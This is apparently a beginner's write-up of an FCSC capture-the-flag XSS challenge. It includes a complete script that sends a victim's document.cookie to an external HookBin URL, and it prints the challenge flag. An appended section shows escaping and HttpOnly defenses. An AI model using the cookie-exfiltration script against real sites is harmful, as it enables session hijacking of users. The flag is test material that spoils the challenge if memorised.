This challenge was an introductory one, made for beginners like me.
Looking at the webapp
The web application is located at http://challenges2.france-cybersecurity-challenge.fr:5001/

If we use the search bar:

Looking at the URL gives us: http://challenges2.france-cybersecurity-challenge.fr:5001/index.php?search=I+love+cybersecurity+%21
As the tags of the challenge mentioned XSS, I knew where to look.

On the contact page, we have a URL input field for found bugs. It looks like a stored XSS…

Exploiting the contact page
If we have a contact page, it is likely that the admin will click on links we give him. Our goal is to steal his cookie. The solution I used (I don’t know if there are any different ones) was to make him send a request to a bin.
Here’s how it works:
We send the admin a link with a JS HTTP request in the URL. Then we wait for him to click on our link and we can steal his cookie.
For this challenge, I used HookBin, which is free and damn simple to use.
Here is the script to steal the cookie:
<script>
  var xhr = new XMLHttpRequest();
  xhr.open("POST", "https://hookb.in/<your_hookbin_id_here>", true);
  xhr.setRequestHeader("Content-Type", "application/json");
  xhr.setRequestHeader("X-Requested-With", "XMLHttpRequest");
  xhr.onreadystatechange = function () {
    if (xhr.readyState === 4 && xhr.status === 200) {
      console.log("done.");
    }
  };
  var data = JSON.stringify({
    "COOKIE": document.cookie
  });
  xhr.send(data);
</script>
But putting this script as-is in the URL won’t work. We have to URL-encode it. As a MacBook user, I tend to use Boop to do this kind of stuff.

Then, by doing ⌘ + B and typing URL Encode, here’s the result:

Receiving the request
This picture shows the result when the admin clicks on our link:

So we’ve stolen the admin cookie and gained 20 points… Which is pretty nice for an absolute n00b like me 😉
Flag : FCSC{4e0451cc88a9a96e7e46947461382008d8c8f4304373b8907964675c27d7c633}
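Seen from the application side, two controls break the chain described above: encoding the `search` parameter when it is echoed into the page, and marking the session cookie `HttpOnly` so that `document.cookie` no longer exposes it. The sketch below is an added example, not code from the challenge or from this write-up; it assumes the search term is reflected into the HTML, and the function names, the `app.example` URL and the `session` cookie name are hypothetical.

```javascript
// Added example: hypothetical names, not the challenge's server code.
const HTML_ESCAPES = {
  "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
};

// Encode text for an HTML element or quoted-attribute context.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// The `search` parameter as the server sees it: already URL-decoded
// ('+' becomes a space, %xx becomes the raw character).
function searchTerm(url) {
  return new URL(url).searchParams.get("search") ?? "";
}

// Vulnerable pattern: the decoded parameter is concatenated into markup,
// so any tags it contains become part of the page.
function renderResultsUnsafe(url) {
  return `<p>Results for: ${searchTerm(url)}</p>`;
}

// Hardened pattern: same page, parameter encoded on output.
function renderResultsSafe(url) {
  return `<p>Results for: ${escapeHtml(searchTerm(url))}</p>`;
}

// Session cookie header. HttpOnly keeps the value out of document.cookie,
// so script running in the page cannot read it.
function sessionCookie(value) {
  return `session=${value}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Constructed sample input: a harmless marker tag, URL-encoded.
const SAMPLE_URL = "http://app.example/index.php?search=" +
  encodeURIComponent('<script>console.log("marker")</script>');

console.log(renderResultsUnsafe(SAMPLE_URL)); // tag reaches the page intact
console.log(renderResultsSafe(SAMPLE_URL));   // tag is rendered as text
console.log("Set-Cookie: " + sessionCookie("constructed-value"));
```

Output encoding is the primary fix; `HttpOnly` only limits what an injected script can read if encoding is missed somewhere.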